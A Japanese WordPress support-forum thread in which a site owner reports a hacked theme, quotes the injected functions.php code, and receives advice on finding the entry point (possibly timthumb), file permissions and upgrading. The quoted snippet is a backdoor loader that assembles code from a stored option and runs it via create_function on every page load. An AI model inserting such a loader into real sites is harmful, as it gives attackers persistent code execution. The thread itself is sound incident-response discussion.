サポート » 使い方全般 » サイト改ざん対策

  • 解決済 rararara

    (@rararara)


    お世話になります。

    2週間程前からログイン前のページの表示速度が極端に遅くなったため、原因を
    調べていたところ、テーマファイル(オリジナル)のfunctions.phpの末部が以下
    のように改ざんされていました。(WPのバージョンは3.1.2、サーバーはiSle)

    function page_options() { $option = get_option('page_option'); $opt=unserialize($option);
    	@$arg = create_function('', $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg('');}
    add_action('wp_head', 'page_options');

    該当箇所の削除と、
    http://www.sawazaki.net/blog_wp/2012/05/09/突然の真っ白/
    を参考に、/wp-includs/page.phpを削除しました。

    表示速度は改善されたものの、再度同様の事態にならないように対策をしたい
    のですが、以下の点以外にどのような事が考えられますでしょうか?

    ・各ユーザーのログインパスワードの変更
    ・DBパスワードの変更
    ・wp-config.phpのパーミション変更(604 >444)
    ・(WPのバージョンアップ)<-とある事情でVer.UPできません。

    以上ご教授いただければと存じます。
    よろしくお願いいたします

2件の返信を表示中 - 1 - 2件目 (全2件中)
  • この種類の問題に詳しくはありませんが、

    wp-includes/page.phpが作られたり、functions.phpが書き換えられるほどだと、進入経路がはっきりしないまま、パーミッションだけ変更しても根治は難しいのではないかと思います。

    ワードプレスの問題ではありませんが、第三者がPHPを実行できたらおしまいです。よくサイトでhtmlでphpが実行できるようになっていたりしますが、低権限の人でもhtmlファイルアップロードできたら、悪意があれば、それで終わりです

    WordPress 3.1.2 2011年4月に出たものですから、

    timthumbの脆弱性を使ったものかもしれないです あてずっぽですが

    以下のプラグインで検査するとか、
    http://wordpress.org/plugins/timthumb-vulnerability-scanner/

    以下のリンクにあるようなサービスで調べるとか
    http://tenman.info/labo/snip/archives/4236

    などが必要です。

    wp-config.phpのパーミション変更(604 >444)

    PHPがモジュールなのかCGIなのかによって、異なると思いますが 444は、最低でも404、動作すれば400ではないかと思います。

    (WPのバージョンアップ)<-とある事情でVer.UPできません。

    コンテンツを維持するなら、新しい環境に移行して、最新版を使うのが、安全性の上でも、労力の上でも、一番安上がりな気がします。

    nobita様
    ご返信いただきありがとうございます。

    timthumbの脆弱性に関しては、お教えいただいたプラグインを導入済みでした
    ので再度検査したところ問題ありませんでした。

    wp-config.phpのパーミションは400でも表示に問題がありませんでしたので、
    変更いたしました。

    WPのバージョンアップもクライアントに相談の上、進めていこうと思います。
    FTPのパスワードも変更いたしましたので追記いたします。

    これにて解決済みにさせていただこうと存じます。
    ありがとうございました。

2件の返信を表示中 - 1 - 2件目 (全2件中)
  • トピック「サイト改ざん対策」には新たに返信することはできません。